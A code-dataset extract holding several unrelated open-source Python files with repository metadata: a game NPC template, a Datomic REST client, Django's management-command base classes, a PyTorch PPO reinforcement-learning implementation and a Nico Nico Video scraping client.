2022-03-24T14:54:37.000Z
|
#### NOTICE: THIS FILE IS AUTOGENERATED
#### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY
#### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES
from swgpy.object import *
def create(kernel):
result = Creature()
result.template = "object/mobile/shared_dressed_death_watch_grey.iff"
result.attribute_template_id = 9
result.stfName("npc_name","human_base_male")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result
| 26.411765
| 70
| 0.732739
|
4a18c1d380a678c04db8c58d5a43a62326156693
| 2,507
|
py
|
Python
|
pydatomic/datomic.py
|
gns24/pydatomic
|
f7e89081a1305b7e916f0d48727d5c588d495ec6
|
[
"MIT"
] | 56
|
2015-01-14T16:38:37.000Z
|
2022-02-24T10:54:53.000Z
|
pydatomic/datomic.py
|
gns24/pydatomic
|
f7e89081a1305b7e916f0d48727d5c588d495ec6
|
[
"MIT"
] | null | null | null |
pydatomic/datomic.py
|
gns24/pydatomic
|
f7e89081a1305b7e916f0d48727d5c588d495ec6
|
[
"MIT"
] | 10
|
2015-01-27T02:53:03.000Z
|
2021-12-06T11:30:24.000Z
|
# -*- coding: utf-8 -*-
import requests
from urlparse import urljoin
from pydatomic.edn import loads
class Database(object):
def __init__(self, name, conn):
self.name = name
self.conn = conn
def __getattr__(self, name):
def f(*args, **kwargs):
return getattr(self.conn, name)(self.name, *args, **kwargs)
return f
class Datomic(object):
def __init__(self, location, storage):
self.location = location
self.storage = storage
def db_url(self, dbname):
return urljoin(self.location, 'data/') + self.storage + '/' + dbname
def create_database(self, dbname):
r = requests.post(self.db_url(''), data={'db-name':dbname})
assert r.status_code in (200, 201), r.text
return Database(dbname, self)
def transact(self, dbname, data):
data = '[%s\n]' % '\n'.join(data)
r = requests.post(self.db_url(dbname)+'/', data={'tx-data':data},
headers={'Accept':'application/edn'})
assert r.status_code in (200, 201), (r.status_code, r.text)
return loads(r.content)
def query(self, dbname, query, extra_args=[], history=False):
args = '[{:db/alias ' + self.storage + '/' + dbname
if history:
args += ' :history true'
args += '} ' + ' '.join(str(a) for a in extra_args) + ']'
r = requests.get(urljoin(self.location, 'api/query'),
params={'args': args, 'q':query},
headers={'Accept':'application/edn'})
assert r.status_code == 200, r.text
return loads(r.content)
def entity(self, dbname, eid):
r = requests.get(self.db_url(dbname) + '/-/entity', params={'e':eid},
headers={'Accept':'application/edn'})
assert r.status_code == 200
return loads(r.content)
if __name__ == '__main__':
q = """[{
:db/id #db/id[:db.part/db]
:db/ident :person/name
:db/valueType :db.type/string
:db/cardinality :db.cardinality/one
:db/doc "A person's name"
:db.install/_attribute :db.part/db}]"""
conn = Datomic('http://localhost:3000/', 'tdb')
db = conn.create_database('cms')
db.transact(q)
db.transact('[{:db/id #db/id[:db.part/user] :person/name "Peter"}]')
r = db.query('[:find ?e ?n :where [?e :person/name ?n]]')
print(r)
eid = r[0][0]
print(db.query('[:find ?n :in $ ?e :where [?e :person/name ?n]]', [eid], history=True))
print(db.entity(eid))
| 34.819444
| 91
| 0.570004
|
4a18c26a3f5479c3d52464f284bfed8ccb8daf69
| 16,883
|
py
|
Python
|
django/core/management/base.py
|
egenerat/gae-django
|
f12379483cf3917ed3cb46ca5ff0b94daf89fc50
|
[
"MIT"
] | 3
|
2016-07-08T23:49:32.000Z
|
2018-04-15T22:55:01.000Z
|
django/core/management/base.py
|
egenerat/gae-django
|
f12379483cf3917ed3cb46ca5ff0b94daf89fc50
|
[
"MIT"
] | 27
|
2017-02-05T15:57:04.000Z
|
2018-04-15T22:57:26.000Z
|
django/core/management/base.py
|
egenerat/gae-django
|
f12379483cf3917ed3cb46ca5ff0b94daf89fc50
|
[
"MIT"
] | null | null | null |
"""
Base classes for writing management commands (named commands which can
be executed through ``django-admin.py`` or ``manage.py``).
"""
import os
import sys
from optparse import make_option, OptionParser
import django
from django.core.exceptions import ImproperlyConfigured
from django.core.management.color import color_style
from django.utils.encoding import smart_str
class CommandError(Exception):
"""
Exception class indicating a problem while executing a management
command.
If this exception is raised during the execution of a management
command, it will be caught and turned into a nicely-printed error
message to the appropriate output stream (i.e., stderr); as a
result, raising this exception (with a sensible description of the
error) is the preferred way to indicate that something has gone
wrong in the execution of a command.
"""
pass
def handle_default_options(options):
"""
Include any default options that all commands should accept here
so that ManagementUtility can handle them before searching for
user commands.
"""
if options.settings:
os.environ['DJANGO_SETTINGS_MODULE'] = options.settings
if options.pythonpath:
sys.path.insert(0, options.pythonpath)
class BaseCommand(object):
"""
The base class from which all management commands ultimately
derive.
Use this class if you want access to all of the mechanisms which
parse the command-line arguments and work out what code to call in
response; if you don't need to change any of that behavior,
consider using one of the subclasses defined in this file.
If you are interested in overriding/customizing various aspects of
the command-parsing and -execution behavior, the normal flow works
as follows:
1. ``django-admin.py`` or ``manage.py`` loads the command class
and calls its ``run_from_argv()`` method.
2. The ``run_from_argv()`` method calls ``create_parser()`` to get
an ``OptionParser`` for the arguments, parses them, performs
any environment changes requested by options like
``pythonpath``, and then calls the ``execute()`` method,
passing the parsed arguments.
3. The ``execute()`` method attempts to carry out the command by
calling the ``handle()`` method with the parsed arguments; any
output produced by ``handle()`` will be printed to standard
output and, if the command is intended to produce a block of
SQL statements, will be wrapped in ``BEGIN`` and ``COMMIT``.
4. If ``handle()`` raised a ``CommandError``, ``execute()`` will
instead print an error message to ``stderr``.
Thus, the ``handle()`` method is typically the starting point for
subclasses; many built-in commands and command types either place
all of their logic in ``handle()``, or perform some additional
parsing work in ``handle()`` and then delegate from it to more
specialized methods as needed.
Several attributes affect behavior at various steps along the way:
``args``
A string listing the arguments accepted by the command,
suitable for use in help messages; e.g., a command which takes
a list of application names might set this to '<appname
appname ...>'.
``can_import_settings``
A boolean indicating whether the command needs to be able to
import Django settings; if ``True``, ``execute()`` will verify
that this is possible before proceeding. Default value is
``True``.
``help``
A short description of the command, which will be printed in
help messages.
``option_list``
This is the list of ``optparse`` options which will be fed
into the command's ``OptionParser`` for parsing arguments.
``output_transaction``
A boolean indicating whether the command outputs SQL
statements; if ``True``, the output will automatically be
wrapped with ``BEGIN;`` and ``COMMIT;``. Default value is
``False``.
``requires_model_validation``
A boolean; if ``True``, validation of installed models will be
performed prior to executing the command. Default value is
``True``. To validate an individual application's models
rather than all applications' models, call
``self.validate(app)`` from ``handle()``, where ``app`` is the
application's Python module.
"""
# Metadata about this command.
option_list = (
make_option('-v', '--verbosity', action='store', dest='verbosity', default='1',
type='choice', choices=['0', '1', '2', '3'],
            help='Verbosity level; 0=minimal output, 1=normal output, 2=verbose output, 3=very verbose output'),
make_option('--settings',
help='The Python path to a settings module, e.g. "myproject.settings.main". If this isn\'t provided, the DJANGO_SETTINGS_MODULE environment variable will be used.'),
make_option('--pythonpath',
help='A directory to add to the Python path, e.g. "/home/djangoprojects/myproject".'),
make_option('--traceback', action='store_true',
help='Print traceback on exception'),
)
help = ''
args = ''
# Configuration shortcuts that alter various logic.
can_import_settings = True
requires_model_validation = True
output_transaction = False # Whether to wrap the output in a "BEGIN; COMMIT;"
def __init__(self):
self.style = color_style()
def get_version(self):
"""
Return the Django version, which should be correct for all
built-in Django commands. User-supplied commands should
override this method.
"""
return django.get_version()
def usage(self, subcommand):
"""
Return a brief description of how to use this command, by
default from the attribute ``self.help``.
"""
usage = '%%prog %s [options] %s' % (subcommand, self.args)
if self.help:
return '%s\n\n%s' % (usage, self.help)
else:
return usage
def create_parser(self, prog_name, subcommand):
"""
Create and return the ``OptionParser`` which will be used to
parse the arguments to this command.
"""
return OptionParser(prog=prog_name,
usage=self.usage(subcommand),
version=self.get_version(),
option_list=self.option_list)
def print_help(self, prog_name, subcommand):
"""
Print the help message for this command, derived from
``self.usage()``.
"""
parser = self.create_parser(prog_name, subcommand)
parser.print_help()
def run_from_argv(self, argv):
"""
Set up any environment changes requested (e.g., Python path
and Django settings), then run this command.
"""
parser = self.create_parser(argv[0], argv[1])
options, args = parser.parse_args(argv[2:])
handle_default_options(options)
self.execute(*args, **options.__dict__)
def execute(self, *args, **options):
"""
Try to execute this command, performing model validation if
needed (as controlled by the attribute
``self.requires_model_validation``). If the command raises a
``CommandError``, intercept it and print it sensibly to
stderr.
"""
# Switch to English, because django-admin.py creates database content
# like permissions, and those shouldn't contain any translations.
# But only do this if we can assume we have a working settings file,
# because django.utils.translation requires settings.
if self.can_import_settings:
try:
from django.utils import translation
translation.activate('en-us')
except ImportError, e:
# If settings should be available, but aren't,
# raise the error and quit.
sys.stderr.write(smart_str(self.style.ERROR('Error: %s\n' % e)))
sys.exit(1)
try:
self.stdout = options.get('stdout', sys.stdout)
self.stderr = options.get('stderr', sys.stderr)
if self.requires_model_validation:
self.validate()
output = self.handle(*args, **options)
if output:
if self.output_transaction:
# This needs to be imported here, because it relies on
# settings.
from django.db import connections, DEFAULT_DB_ALIAS
connection = connections[options.get('database', DEFAULT_DB_ALIAS)]
if connection.ops.start_transaction_sql():
self.stdout.write(self.style.SQL_KEYWORD(connection.ops.start_transaction_sql()) + '\n')
self.stdout.write(output)
if self.output_transaction:
self.stdout.write('\n' + self.style.SQL_KEYWORD("COMMIT;") + '\n')
except CommandError, e:
self.stderr.write(smart_str(self.style.ERROR('Error: %s\n' % e)))
sys.exit(1)
def validate(self, app=None, display_num_errors=False):
"""
Validates the given app, raising CommandError for any errors.
If app is None, then this will validate all installed apps.
"""
from django.core.management.validation import get_validation_errors
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
s = StringIO()
num_errors = get_validation_errors(s, app)
if num_errors:
s.seek(0)
error_text = s.read()
raise CommandError("One or more models did not validate:\n%s" % error_text)
if display_num_errors:
self.stdout.write("%s error%s found\n" % (num_errors, num_errors != 1 and 's' or ''))
def handle(self, *args, **options):
"""
The actual logic of the command. Subclasses must implement
this method.
"""
raise NotImplementedError()
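
# Illustrative subclass (not part of this module): a minimal command placed
# in <app>/management/commands/greet.py might look like:
#
#     class Command(BaseCommand):
#         help = 'Prints a greeting.'
#         args = '<name>'
#
#         def handle(self, *args, **options):
#             return 'Hello, %s!\n' % (args[0] if args else 'world')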
class AppCommand(BaseCommand):
"""
A management command which takes one or more installed application
names as arguments, and does something with each of them.
Rather than implementing ``handle()``, subclasses must implement
``handle_app()``, which will be called once for each application.
"""
args = '<appname appname ...>'
def handle(self, *app_labels, **options):
from django.db import models
if not app_labels:
raise CommandError('Enter at least one appname.')
try:
app_list = [models.get_app(app_label) for app_label in app_labels]
        except (ImproperlyConfigured, ImportError) as e:
raise CommandError("%s. Are you sure your INSTALLED_APPS setting is correct?" % e)
output = []
for app in app_list:
app_output = self.handle_app(app, **options)
if app_output:
output.append(app_output)
return '\n'.join(output)
def handle_app(self, app, **options):
"""
Perform the command's actions for ``app``, which will be the
Python module corresponding to an application name given on
the command line.
"""
raise NotImplementedError()
class LabelCommand(BaseCommand):
"""
A management command which takes one or more arbitrary arguments
(labels) on the command line, and does something with each of
them.
Rather than implementing ``handle()``, subclasses must implement
``handle_label()``, which will be called once for each label.
If the arguments should be names of installed applications, use
``AppCommand`` instead.
"""
args = '<label label ...>'
label = 'label'
def handle(self, *labels, **options):
if not labels:
raise CommandError('Enter at least one %s.' % self.label)
output = []
for label in labels:
label_output = self.handle_label(label, **options)
if label_output:
output.append(label_output)
return '\n'.join(output)
def handle_label(self, label, **options):
"""
Perform the command's actions for ``label``, which will be the
string as given on the command line.
"""
raise NotImplementedError()
class NoArgsCommand(BaseCommand):
"""
A command which takes no arguments on the command line.
Rather than implementing ``handle()``, subclasses must implement
``handle_noargs()``; ``handle()`` itself is overridden to ensure
no arguments are passed to the command.
Attempting to pass arguments will raise ``CommandError``.
"""
args = ''
def handle(self, *args, **options):
if args:
raise CommandError("Command doesn't accept any arguments")
return self.handle_noargs(**options)
def handle_noargs(self, **options):
"""
Perform this command's actions.
"""
raise NotImplementedError()
def copy_helper(style, app_or_project, name, directory, other_name=''):
"""
Copies either a Django application layout template or a Django project
layout template into the specified directory.
"""
# style -- A color style object (see django.core.management.color).
# app_or_project -- The string 'app' or 'project'.
# name -- The name of the application or project.
# directory -- The directory to which the layout template should be copied.
# other_name -- When copying an application layout, this should be the name
# of the project.
import re
import shutil
other = {'project': 'app', 'app': 'project'}[app_or_project]
if not re.search(r'^[_a-zA-Z]\w*$', name): # If it's not a valid directory name.
# Provide a smart error message, depending on the error.
if not re.search(r'^[_a-zA-Z]', name):
message = 'make sure the name begins with a letter or underscore'
else:
message = 'use only numbers, letters and underscores'
raise CommandError("%r is not a valid %s name. Please %s." % (name, app_or_project, message))
top_dir = os.path.join(directory, name)
try:
os.mkdir(top_dir)
    except OSError as e:
raise CommandError(e)
# Determine where the app or project templates are. Use
# django.__path__[0] because we don't know into which directory
# django has been installed.
template_dir = os.path.join(django.__path__[0], 'conf', '%s_template' % app_or_project)
for d, subdirs, files in os.walk(template_dir):
relative_dir = d[len(template_dir)+1:].replace('%s_name' % app_or_project, name)
if relative_dir:
os.mkdir(os.path.join(top_dir, relative_dir))
for subdir in subdirs[:]:
if subdir.startswith('.'):
subdirs.remove(subdir)
for f in files:
if not f.endswith('.py'):
                # Ignore .pyc, .pyo, .py.class, etc., as they cause various
                # breakages.
continue
path_old = os.path.join(d, f)
path_new = os.path.join(top_dir, relative_dir, f.replace('%s_name' % app_or_project, name))
            with open(path_old, 'r') as fp_old, open(path_new, 'w') as fp_new:
                fp_new.write(fp_old.read().replace('{{ %s_name }}' % app_or_project, name).replace('{{ %s_name }}' % other, other_name))
try:
shutil.copymode(path_old, path_new)
_make_writeable(path_new)
except OSError:
sys.stderr.write(style.NOTICE("Notice: Couldn't set permission bits on %s. You're probably using an uncommon filesystem setup. No problem.\n" % path_new))
def _make_writeable(filename):
"""
Make sure that the file is writeable. Useful if our source is
read-only.
"""
import stat
if sys.platform.startswith('java'):
# On Jython there is no os.access()
return
if not os.access(filename, os.W_OK):
st = os.stat(filename)
new_permissions = stat.S_IMODE(st.st_mode) | stat.S_IWUSR
os.chmod(filename, new_permissions)
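# Permission example: a read-only file with mode 0444 gains stat.S_IWUSR
# (0200) and becomes 0644, i.e. writeable by its owner.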
| 39.081019
| 178
| 0.612687
|
4a18c2789e86932058f18c6c23eadc714139935f
| 16,684
|
py
|
Python
|
spinup/algos/pytorch/ppo/ppo.py
|
RamiSketcher/spinningupMPAC
|
543a3587ef88cd098ec2f060f183d0f9969e92e3
|
[
"MIT"
] | null | null | null |
spinup/algos/pytorch/ppo/ppo.py
|
RamiSketcher/spinningupMPAC
|
543a3587ef88cd098ec2f060f183d0f9969e92e3
|
[
"MIT"
] | null | null | null |
spinup/algos/pytorch/ppo/ppo.py
|
RamiSketcher/spinningupMPAC
|
543a3587ef88cd098ec2f060f183d0f9969e92e3
|
[
"MIT"
] | null | null | null |
import numpy as np
import torch
from torch.optim import Adam
import gym
import time
import spinup.algos.pytorch.ppo.core as core
from spinup.utils.logx import EpochLogger
from spinup.utils.mpi_pytorch import setup_pytorch_for_mpi, sync_params, mpi_avg_grads
from spinup.utils.mpi_tools import mpi_fork, mpi_avg, proc_id, mpi_statistics_scalar, num_procs
from spinup.pddm_envs.gym_env import GymEnv
class PPOBuffer:
"""
A buffer for storing trajectories experienced by a PPO agent interacting
with the environment, and using Generalized Advantage Estimation (GAE-Lambda)
for calculating the advantages of state-action pairs.
"""
def __init__(self, obs_dim, act_dim, size, gamma=0.99, lam=0.95):
self.obs_buf = np.zeros(core.combined_shape(size, obs_dim), dtype=np.float32)
self.act_buf = np.zeros(core.combined_shape(size, act_dim), dtype=np.float32)
self.adv_buf = np.zeros(size, dtype=np.float32)
self.rew_buf = np.zeros(size, dtype=np.float32)
self.ret_buf = np.zeros(size, dtype=np.float32)
self.val_buf = np.zeros(size, dtype=np.float32)
self.logp_buf = np.zeros(size, dtype=np.float32)
self.gamma, self.lam = gamma, lam
self.ptr, self.path_start_idx, self.max_size = 0, 0, size
def store(self, obs, act, rew, val, logp):
"""
Append one timestep of agent-environment interaction to the buffer.
"""
assert self.ptr < self.max_size # buffer has to have room so you can store
self.obs_buf[self.ptr] = obs
self.act_buf[self.ptr] = act
self.rew_buf[self.ptr] = rew
self.val_buf[self.ptr] = val
self.logp_buf[self.ptr] = logp
self.ptr += 1
def finish_path(self, last_val=0):
"""
Call this at the end of a trajectory, or when one gets cut off
by an epoch ending. This looks back in the buffer to where the
trajectory started, and uses rewards and value estimates from
the whole trajectory to compute advantage estimates with GAE-Lambda,
as well as compute the rewards-to-go for each state, to use as
the targets for the value function.
The "last_val" argument should be 0 if the trajectory ended
because the agent reached a terminal state (died), and otherwise
should be V(s_T), the value function estimated for the last state.
This allows us to bootstrap the reward-to-go calculation to account
for timesteps beyond the arbitrary episode horizon (or epoch cutoff).
"""
path_slice = slice(self.path_start_idx, self.ptr)
rews = np.append(self.rew_buf[path_slice], last_val)
vals = np.append(self.val_buf[path_slice], last_val)
# the next two lines implement GAE-Lambda advantage calculation
deltas = rews[:-1] + self.gamma * vals[1:] - vals[:-1]
self.adv_buf[path_slice] = core.discount_cumsum(deltas, self.gamma * self.lam)
# the next line computes rewards-to-go, to be targets for the value function
self.ret_buf[path_slice] = core.discount_cumsum(rews, self.gamma)[:-1]
self.path_start_idx = self.ptr
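    # GAE-Lambda in brief (matching finish_path above): with
    # delta_t = r_t + gamma * V(s_{t+1}) - V(s_t), the advantage is
    # A_t = sum_{l >= 0} (gamma * lam)^l * delta_{t+l}. Worked example:
    # gamma = lam = 1, rewards [1, 1], values [0, 0], last_val = 0 give
    # deltas [1, 1], advantages [2, 1], and returns [2, 1].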
def get(self):
"""
Call this at the end of an epoch to get all of the data from
the buffer, with advantages appropriately normalized (shifted to have
mean zero and std one). Also, resets some pointers in the buffer.
"""
assert self.ptr == self.max_size # buffer has to be full before you can get
self.ptr, self.path_start_idx = 0, 0
# the next two lines implement the advantage normalization trick
adv_mean, adv_std = mpi_statistics_scalar(self.adv_buf)
self.adv_buf = (self.adv_buf - adv_mean) / adv_std
data = dict(obs=self.obs_buf, act=self.act_buf, ret=self.ret_buf,
adv=self.adv_buf, logp=self.logp_buf)
return {k: torch.as_tensor(v, dtype=torch.float32) for k,v in data.items()}
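# Normalization example for get(): advantages [1.0, 3.0] have mean 2.0 and
# std 1.0, so they are returned as [-1.0, 1.0].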
def ppo(env_fn, actor_critic=core.MLPActorCritic, ac_kwargs=dict(), seed=0,
steps_per_epoch=4000, epochs=125, gamma=0.99, clip_ratio=0.2, pi_lr=3e-4,
vf_lr=1e-3, train_pi_iters=80, train_v_iters=80, lam=0.97, max_ep_len=70,
target_kl=0.01, logger_kwargs=dict(), save_freq=10):
"""
Proximal Policy Optimization (by clipping),
with early stopping based on approximate KL
Args:
env_fn : A function which creates a copy of the environment.
The environment must satisfy the OpenAI Gym API.
actor_critic: The constructor method for a PyTorch Module with a
``step`` method, an ``act`` method, a ``pi`` module, and a ``v``
module. The ``step`` method should accept a batch of observations
and return:
=========== ================ ======================================
Symbol Shape Description
=========== ================ ======================================
``a`` (batch, act_dim) | Numpy array of actions for each
| observation.
``v`` (batch,) | Numpy array of value estimates
| for the provided observations.
``logp_a`` (batch,) | Numpy array of log probs for the
| actions in ``a``.
=========== ================ ======================================
The ``act`` method behaves the same as ``step`` but only returns ``a``.
The ``pi`` module's forward call should accept a batch of
observations and optionally a batch of actions, and return:
=========== ================ ======================================
Symbol Shape Description
=========== ================ ======================================
``pi`` N/A | Torch Distribution object, containing
| a batch of distributions describing
| the policy for the provided observations.
``logp_a`` (batch,) | Optional (only returned if batch of
| actions is given). Tensor containing
| the log probability, according to
| the policy, of the provided actions.
| If actions not given, will contain
| ``None``.
=========== ================ ======================================
The ``v`` module's forward call should accept a batch of observations
and return:
=========== ================ ======================================
Symbol Shape Description
=========== ================ ======================================
``v`` (batch,) | Tensor containing the value estimates
| for the provided observations. (Critical:
| make sure to flatten this!)
=========== ================ ======================================
ac_kwargs (dict): Any kwargs appropriate for the ActorCritic object
you provided to PPO.
seed (int): Seed for random number generators.
steps_per_epoch (int): Number of steps of interaction (state-action pairs)
for the agent and the environment in each epoch.
epochs (int): Number of epochs of interaction (equivalent to
number of policy updates) to perform.
gamma (float): Discount factor. (Always between 0 and 1.)
clip_ratio (float): Hyperparameter for clipping in the policy objective.
Roughly: how far can the new policy go from the old policy while
still profiting (improving the objective function)? The new policy
can still go farther than the clip_ratio says, but it doesn't help
on the objective anymore. (Usually small, 0.1 to 0.3.) Typically
denoted by :math:`\epsilon`.
pi_lr (float): Learning rate for policy optimizer.
vf_lr (float): Learning rate for value function optimizer.
train_pi_iters (int): Maximum number of gradient descent steps to take
on policy loss per epoch. (Early stopping may cause optimizer
to take fewer than this.)
train_v_iters (int): Number of gradient descent steps to take on
value function per epoch.
lam (float): Lambda for GAE-Lambda. (Always between 0 and 1,
close to 1.)
max_ep_len (int): Maximum length of trajectory / episode / rollout.
target_kl (float): Roughly what KL divergence we think is appropriate
between new and old policies after an update. This will get used
for early stopping. (Usually small, 0.01 or 0.05.)
logger_kwargs (dict): Keyword args for EpochLogger.
save_freq (int): How often (in terms of gap between epochs) to save
the current policy and value function.
"""
# Special function to avoid certain slowdowns from PyTorch + MPI combo.
setup_pytorch_for_mpi()
# Set up logger and save configuration
logger = EpochLogger(**logger_kwargs)
logger.save_config(locals())
# Random seed
seed += 10000 * proc_id()
torch.manual_seed(seed)
np.random.seed(seed)
# Instantiate environment
env = env_fn()
obs_dim = env.observation_space.shape
act_dim = env.action_space.shape
# Create actor-critic module
ac = actor_critic(env.observation_space, env.action_space, **ac_kwargs)
# Sync params across processes
sync_params(ac)
# Count variables
var_counts = tuple(core.count_vars(module) for module in [ac.pi, ac.v])
logger.log('\nNumber of parameters: \t pi: %d, \t v: %d\n'%var_counts)
# Set up experience buffer
local_steps_per_epoch = int(steps_per_epoch / num_procs())
buf = PPOBuffer(obs_dim, act_dim, local_steps_per_epoch, gamma, lam)
# Set up function for computing PPO policy loss
def compute_loss_pi(data):
obs, act, adv, logp_old = data['obs'], data['act'], data['adv'], data['logp']
# Policy loss
pi, logp = ac.pi(obs, act)
ratio = torch.exp(logp - logp_old)
clip_adv = torch.clamp(ratio, 1-clip_ratio, 1+clip_ratio) * adv
loss_pi = -(torch.min(ratio * adv, clip_adv)).mean()
# Useful extra info
approx_kl = (logp_old - logp).mean().item()
ent = pi.entropy().mean().item()
clipped = ratio.gt(1+clip_ratio) | ratio.lt(1-clip_ratio)
clipfrac = torch.as_tensor(clipped, dtype=torch.float32).mean().item()
pi_info = dict(kl=approx_kl, ent=ent, cf=clipfrac)
return loss_pi, pi_info
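    # compute_loss_pi implements the PPO clipped surrogate,
    # L = -E[min(r_t * A_t, clip(r_t, 1 - eps, 1 + eps) * A_t)] with
    # r_t = pi(a|s) / pi_old(a|s); e.g. with A = 1 and clip_ratio = 0.2,
    # a ratio of 1.5 contributes only 1.2 to the objective.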
# Set up function for computing value loss
def compute_loss_v(data):
obs, ret = data['obs'], data['ret']
return ((ac.v(obs) - ret)**2).mean()
# Set up optimizers for policy and value function
pi_optimizer = Adam(ac.pi.parameters(), lr=pi_lr)
vf_optimizer = Adam(ac.v.parameters(), lr=vf_lr)
# Set up model saving
logger.setup_pytorch_saver(ac)
def update():
data = buf.get()
pi_l_old, pi_info_old = compute_loss_pi(data)
pi_l_old = pi_l_old.item()
v_l_old = compute_loss_v(data).item()
# Train policy with multiple steps of gradient descent
for i in range(train_pi_iters):
pi_optimizer.zero_grad()
loss_pi, pi_info = compute_loss_pi(data)
kl = mpi_avg(pi_info['kl'])
if kl > 1.5 * target_kl:
logger.log('Early stopping at step %d due to reaching max kl.'%i)
break
loss_pi.backward()
mpi_avg_grads(ac.pi) # average grads across MPI processes
pi_optimizer.step()
logger.store(StopIter=i)
# Value function learning
for i in range(train_v_iters):
vf_optimizer.zero_grad()
loss_v = compute_loss_v(data)
loss_v.backward()
mpi_avg_grads(ac.v) # average grads across MPI processes
vf_optimizer.step()
# Log changes from update
kl, ent, cf = pi_info['kl'], pi_info_old['ent'], pi_info['cf']
logger.store(LossPi=pi_l_old, LossV=v_l_old,
KL=kl, Entropy=ent, ClipFrac=cf,
DeltaLossPi=(loss_pi.item() - pi_l_old),
DeltaLossV=(loss_v.item() - v_l_old))
# Prepare for interaction with environment
start_time = time.time()
o, ep_ret, ep_len, score = env.reset(), 0, 0, 0
# Main loop: collect experience in env and update/log each epoch
for epoch in range(epochs):
for t in range(local_steps_per_epoch):
a, v, logp = ac.step(torch.as_tensor(o, dtype=torch.float32))
next_o, r, d, info = env.step(a)
ep_ret += r
ep_len += 1
score += info['score'] # Gaffar
# save and log
buf.store(o, a, r, v, logp)
logger.store(VVals=v)
# Update obs (critical!)
o = next_o
timeout = ep_len == max_ep_len
terminal = d or timeout
epoch_ended = t==local_steps_per_epoch-1
if terminal or epoch_ended:
                if epoch_ended and not terminal:
print('Warning: trajectory cut off by epoch at %d steps.'%ep_len, flush=True)
# if trajectory didn't reach terminal state, bootstrap value target
if timeout or epoch_ended:
_, v, _ = ac.step(torch.as_tensor(o, dtype=torch.float32))
else:
v = 0
buf.finish_path(v)
if terminal:
# only save EpRet / EpLen if trajectory finished
logger.store(EpRet=ep_ret, EpLen=ep_len)
logger.store(Score=score) # Gaffar
                o, ep_ret, ep_len, score = env.reset(), 0, 0, 0  # also reset the per-episode score
# Save model
if (epoch % save_freq == 0) or (epoch == epochs-1):
logger.save_state({'env': env}, None)
# Perform PPO update!
update()
# Log info about epoch
logger.log_tabular('Epoch', epoch)
logger.log_tabular('EpRet', with_min_and_max=True)
logger.log_tabular('EpLen', average_only=True)
logger.log_tabular('Score', average_only=True) # Gaffar
logger.log_tabular('VVals', with_min_and_max=True)
logger.log_tabular('TotalEnvInteracts', (epoch+1)*steps_per_epoch)
logger.log_tabular('LossPi', average_only=True)
logger.log_tabular('LossV', average_only=True)
logger.log_tabular('DeltaLossPi', average_only=True)
logger.log_tabular('DeltaLossV', average_only=True)
logger.log_tabular('Entropy', average_only=True)
logger.log_tabular('KL', average_only=True)
logger.log_tabular('ClipFrac', average_only=True)
logger.log_tabular('StopIter', average_only=True)
logger.log_tabular('Time', time.time()-start_time)
logger.dump_tabular()
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser()
# parser.add_argument('--env', type=str, default='HalfCheetah-v2')
parser.add_argument('--env', type=str, default='pddm_cheetah-v0')
parser.add_argument('--hid', type=int, default=64)
parser.add_argument('--l', type=int, default=2)
parser.add_argument('--gamma', type=float, default=0.99)
parser.add_argument('--seed', '-s', type=int, default=0)
parser.add_argument('--cpu', type=int, default=4)
parser.add_argument('--steps', type=int, default=4000)
parser.add_argument('--epochs', type=int, default=50)
parser.add_argument('--exp_name', type=str, default='ppo')
args = parser.parse_args()
mpi_fork(args.cpu) # run parallel code with mpi
from spinup.utils.run_utils import setup_logger_kwargs
logger_kwargs = setup_logger_kwargs(args.exp_name, args.seed)
ppo(lambda : gym.make(args.env), actor_critic=core.MLPActorCritic,
ac_kwargs=dict(hidden_sizes=[args.hid]*args.l), gamma=args.gamma,
seed=args.seed, steps_per_epoch=args.steps, epochs=args.epochs,
logger_kwargs=logger_kwargs)
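# Example invocation (a sketch; the file name is assumed, flags are as
# defined by the argparse setup above):
#     python ppo.py --env pddm_cheetah-v0 --cpu 4 --steps 4000 --epochs 50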
| 43.447917
| 97
| 0.585291
|
4a18c2add19cbe96301956526083004fc5a3fcb6
| 1,779
|
py
|
Python
|
niconico/video.py
|
tuna2134/niconico.py
|
0c06fb25a25599a1eabffe471e1fcf7a399236ac
|
[
"MIT"
] | null | null | null |
niconico/video.py
|
tuna2134/niconico.py
|
0c06fb25a25599a1eabffe471e1fcf7a399236ac
|
[
"MIT"
] | null | null | null |
niconico/video.py
|
tuna2134/niconico.py
|
0c06fb25a25599a1eabffe471e1fcf7a399236ac
|
[
"MIT"
] | null | null | null |
# niconico.py - Video
from typing import TYPE_CHECKING, NoReturn, Union
from threading import Thread
from bs4 import BeautifulSoup
from .base import DictFromAttribute, BaseClient
from .exceptions import ExtractFailed
from .headers import Headers, VIDEO
from ._json import loads, dumps
from .types.video import EasyComment, Tag, Video as VideoType
class Video(DictFromAttribute):
if TYPE_CHECKING:
easyComment: EasyComment
tag: Tag
video: VideoType
def __init__(self, client: "Client", url: str, data: dict):
self.client, self.url, self.data = client, url, data
super().__init__(self.data)
    def get_download_link(self):
        # Placeholder: not implemented in this snapshot of the library.
        ...
    def _heartbeat(self):
        # Placeholder: not implemented in this snapshot of the library.
        ...
class Client(BaseClient):
def get_video(self, url: str, headers: Headers = VIDEO) -> Union[Video, NoReturn]:
"""Get video data from Nico Nico Video.
        Parameters
        ----------
        url : str
            URL of the video to fetch.
        headers : Headers, default VIDEO
            Headers to be used when making a request.
        Returns
        -------
        video : Video
            The extracted video data.
Raises
------
ExtractFailed"""
if "nico.ms" in url:
url = url.replace("nico.ms/", "www.nicovideo.jp/watch/")
if "sp" in url:
url = url.replace("sp", "www")
data = BeautifulSoup(
self.client.request(
"get", url, headers=headers, cookies=self.cookies
).text, "html.parser"
).find(
"div", {"id": "js-initial-watch-data"}
).get("data-api-data")
        if not data:
            raise ExtractFailed("Failed to extract video data from Nico Nico Video.")
        # Parse the embedded JSON payload before wrapping it in a Video object.
        return Video(self, url, loads(data))
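# Minimal usage sketch (hypothetical; assumes BaseClient needs no constructor
# arguments and that the URL points at a public video):
#     client = Client()
#     video = client.get_video("https://www.nicovideo.jp/watch/sm9")
#     print(video.video)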
| 25.414286
| 86
| 0.583474
|
4a18c3fc38981d3d69c8288058cc5de6bef2eb81
| 527
|
py
|
Python
|
dsproject/{{cookiecutter.project_slug}}/scripts/example.py
|
timothyb0912/cookiecutters
|
dbe386d7e30cd66886562d779ca83a880788337a
|
[
"MIT"
] | null | null | null |
